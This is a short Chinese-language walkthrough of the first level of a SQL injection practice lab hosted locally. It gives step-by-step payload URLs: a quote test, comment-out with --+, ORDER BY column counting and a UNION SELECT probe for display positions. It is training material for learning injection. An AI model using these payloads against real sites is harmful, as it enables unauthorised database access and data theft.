目录
首先判断注入方式:
首先使用'、"等符号判断有没有sql注入的存在,然后判断sql语句的类型,接着利用sql语句的特点进行信息的获取。
Less-1
1. 输入id=1:
2. 接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入http://127.0.0.1/sqli/Less-1/?id=1':
3. 输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入http://127.0.0.1/sqli/Less-1/?id=1' --+:
根据提示可以判断出后台的sql语句为:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
4. 接着使用order by 语句判断,该表中一共有几列数据;order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列:http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+和http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+:
5. 将id=1改为一个数据库不存在的id值,如-1,使用union select 1,2,3联合查询语句查看页面是否有显示位:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+。
发现页面先输出了2和3,说明页面有2个显示位。
6. 然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息